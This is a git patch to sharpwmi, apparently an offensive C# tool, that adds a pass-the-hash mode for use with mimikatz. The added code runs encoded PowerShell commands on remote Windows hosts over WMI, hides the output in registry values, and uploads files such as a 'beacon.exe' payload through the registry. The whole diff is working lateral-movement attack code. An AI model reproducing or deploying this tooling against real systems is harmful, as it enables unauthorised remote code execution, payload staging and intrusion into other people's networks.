From 2ff1bf5144d97e0a8c3bea1d9d9e71c3554c9e2c Mon Sep 17 00:00:00 2001 From: n0thing <63334123+n0thing0x01@users.noreply.github.com> Date: Wed, 26 Aug 2020 17:15:41 +0800 Subject: [PATCH] =?UTF-8?q?=E6=94=AF=E6=8C=81=E4=B8=8Emimikatz=E7=9A=84pth?= =?UTF-8?q?=E4=BA=A4=E4=BA=92?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sharpwmi/sharpwmi/Program.cs | 169 +++++++++++++++++++++++++---------- 1 file changed, 123 insertions(+), 46 deletions(-) diff --git a/sharpwmi/sharpwmi/Program.cs b/sharpwmi/sharpwmi/Program.cs index 2f17f6f..d404275 100644 --- a/sharpwmi/sharpwmi/Program.cs +++ b/sharpwmi/sharpwmi/Program.cs @@ -1,4 +1,4 @@ -using System; +using System; using System.Text; using System.Threading; using System.IO; @@ -35,85 +35,162 @@ public static string Base64Decode(string content) byte[] bytes = Convert.FromBase64String(content); return Encoding.Unicode.GetString(bytes); } + + public void run(string[] args) { - if (args.Length < 5) + if (args.Length < 3) { - Console.WriteLine("\n \t\tsharpwmi.exe 192.168.2.3 administrator 123 cmd whoami\n\t\tsharpwmi.exe 192.168.2.3 administrator 123 upload beacon.exe c:\\beacon.exe"); + Console.WriteLine("\n\t\tsharpwmi.exe 192.168.2.3 administrator 123 cmd whoami\n\t\tsharpwmi.exe 192.168.2.3 administrator 123 upload beacon.exe c:\\beacon.exe\n\t\tsharpwmi.exe pth 192.168.2.3 cmd whoami\n\t\tsharpwmi.exe pth 192.168.2.3 upload beacon.exe c:\\beacon.exe"); return; } - ConnectionOptions options = new ConnectionOptions(); - string host = args[0]; - options.Username = args[1]; - options.Password = args[2]; + if (args[0] == "pth") { - int delay = 5000; + string host = args[1]; + string func_name = args[2]; + string command = ""; + string local_file = ""; + string remote_file = ""; + if (func_name == "cmd") + { + command=args[3]; + } + else + { + local_file = args[3]; + remote_file = args[4]; + } + ConnectionOptions options = new ConnectionOptions(); - this.scope = new ManagementScope("\\\\" + host + "\\root\\cimv2", options); - this.scope.Options.Impersonation = System.Management.ImpersonationLevel.Impersonate; - this.scope.Options.EnablePrivileges = true; - this.scope.Connect(); + int delay = 5000; + this.scope = new ManagementScope("\\\\" + host + "\\root\\cimv2", options); + this.scope.Options.Impersonation = System.Management.ImpersonationLevel.Impersonate; + this.scope.Options.EnablePrivileges = true; + this.scope.Connect(); + if (func_name == "cmd") { + string powershell_command = "powershell -enc " + Base64Encode(command); - if (args[3] == "cmd") - { - string powershell_command = "powershell -enc " + Base64Encode(args[4]); + string code = "$a=(" + powershell_command + ");$b=[Convert]::ToBase64String([System.Text.UnicodeEncoding]::Unicode.GetBytes($a));$reg = Get-WmiObject -List -Namespace root\\default | Where-Object {$_.Name -eq \"StdRegProv\"};$reg.SetStringValue(2147483650,\"\",\"txt\",$b)"; + + ExecCmd("powershell -enc " + Base64Encode(code)); + Console.WriteLine("[+]Exec done!\n"); + Thread.Sleep(delay); + + //this.ExecCmd("whoami"); + // 读取注册表 + ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); + ManagementBaseObject inParams = registry.GetMethodParameters("GetStringValue"); + + inParams["sSubKeyName"] = ""; + inParams["sValueName"] = "txt"; + ManagementBaseObject outParams = registry.InvokeMethod("GetStringValue", inParams, null); + // (String)outParams["sValue"]; - string code = "$a=(" + powershell_command + ");$b=[Convert]::ToBase64String([System.Text.UnicodeEncoding]::Unicode.GetBytes($a));$reg = Get-WmiObject -List -Namespace root\\default | Where-Object {$_.Name -eq \"StdRegProv\"};$reg.SetStringValue(2147483650,\"\",\"txt\",$b)"; + Console.WriteLine("[+]output -> \n\n" + Base64Decode(outParams["sValue"].ToString())); + }else if (func_name == "upload") + { + byte[] str = File.ReadAllBytes(local_file); - ExecCmd("powershell -enc " + Base64Encode(code)); - Console.WriteLine("[+]Exec done!\n"); - Thread.Sleep(delay); + ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); + ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue"); + inParams["hDefKey"] = 2147483650; //HKEY_LOCAL_MACHINE; + inParams["sSubKeyName"] = @""; + inParams["sValueName"] = "upload"; - //this.ExecCmd("whoami"); - // 读取注册表 - ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); - ManagementBaseObject inParams = registry.GetMethodParameters("GetStringValue"); + inParams["sValue"] = Convert.ToBase64String(str); + ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null); - inParams["sSubKeyName"] = ""; - inParams["sValueName"] = "txt"; - ManagementBaseObject outParams = registry.InvokeMethod("GetStringValue", inParams, null); - // (String)outParams["sValue"]; - Console.WriteLine("[+]output -> \n\n" + Base64Decode(outParams["sValue"].ToString())); + + //通过注册表还原文件 + string pscode = string.Format("$wmi = [wmiclass]\"Root\\default:stdRegProv\";$data=($wmi.GetStringValue(2147483650,\"\",\"upload\")).sValue;$byteArray = [Convert]::FromBase64String($data);[io.file]::WriteAllBytes(\"{0:s}\",$byteArray);;", remote_file); + string powershell_command = "powershell -enc " + Base64Encode(pscode); + + Thread.Sleep(delay); + ExecCmd(powershell_command); + Console.WriteLine("[+]Upload file done!"); + return; + } + } - else if (args[3] == "upload") + else { + ConnectionOptions options = new ConnectionOptions(); + string host = args[0]; + options.Username = args[1]; + options.Password = args[2]; - //写注册表 - byte[] str = File.ReadAllBytes(args[4]); + int delay = 5000; + this.scope = new ManagementScope("\\\\" + host + "\\root\\cimv2", options); + this.scope.Options.Impersonation = System.Management.ImpersonationLevel.Impersonate; + this.scope.Options.EnablePrivileges = true; + this.scope.Connect(); - ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); - ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue"); - inParams["hDefKey"] = 2147483650; //HKEY_LOCAL_MACHINE; - inParams["sSubKeyName"] = @""; - inParams["sValueName"] = "upload"; + if (args[3] == "cmd") + { + string powershell_command = "powershell -enc " + Base64Encode(args[4]); - inParams["sValue"] = Convert.ToBase64String(str); - ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null); + string code = "$a=(" + powershell_command + ");$b=[Convert]::ToBase64String([System.Text.UnicodeEncoding]::Unicode.GetBytes($a));$reg = Get-WmiObject -List -Namespace root\\default | Where-Object {$_.Name -eq \"StdRegProv\"};$reg.SetStringValue(2147483650,\"\",\"txt\",$b)"; + ExecCmd("powershell -enc " + Base64Encode(code)); + Console.WriteLine("[+]Exec done!\n"); + Thread.Sleep(delay); - //通过注册表还原文件 - string pscode = string.Format("$wmi = [wmiclass]\"Root\\default:stdRegProv\";$data=($wmi.GetStringValue(2147483650,\"\",\"upload\")).sValue;$byteArray = [Convert]::FromBase64String($data);[io.file]::WriteAllBytes(\"{0:s}\",$byteArray);;", args[5]); - string powershell_command = "powershell -enc " + Base64Encode(pscode); + //this.ExecCmd("whoami"); + // 读取注册表 + ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); + ManagementBaseObject inParams = registry.GetMethodParameters("GetStringValue"); - Thread.Sleep(delay); - ExecCmd(powershell_command); - Console.WriteLine("[+]Upload file done!"); - return; + inParams["sSubKeyName"] = ""; + inParams["sValueName"] = "txt"; + ManagementBaseObject outParams = registry.InvokeMethod("GetStringValue", inParams, null); + // (String)outParams["sValue"]; - } + Console.WriteLine("[+]output -> \n\n" + Base64Decode(outParams["sValue"].ToString())); + } + else if (args[3] == "upload") + { + + //写注册表 + byte[] str = File.ReadAllBytes(args[4]); + + + ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); + ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue"); + inParams["hDefKey"] = 2147483650; //HKEY_LOCAL_MACHINE; + inParams["sSubKeyName"] = @""; + inParams["sValueName"] = "upload"; + + inParams["sValue"] = Convert.ToBase64String(str); + ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null); + + + + //通过注册表还原文件 + string pscode = string.Format("$wmi = [wmiclass]\"Root\\default:stdRegProv\";$data=($wmi.GetStringValue(2147483650,\"\",\"upload\")).sValue;$byteArray = [Convert]::FromBase64String($data);[io.file]::WriteAllBytes(\"{0:s}\",$byteArray);;", args[5]); + string powershell_command = "powershell -enc " + Base64Encode(pscode); + + Thread.Sleep(delay); + ExecCmd(powershell_command); + Console.WriteLine("[+]Upload file done!"); + return; + + } + } + + } static void Main(string[] args) {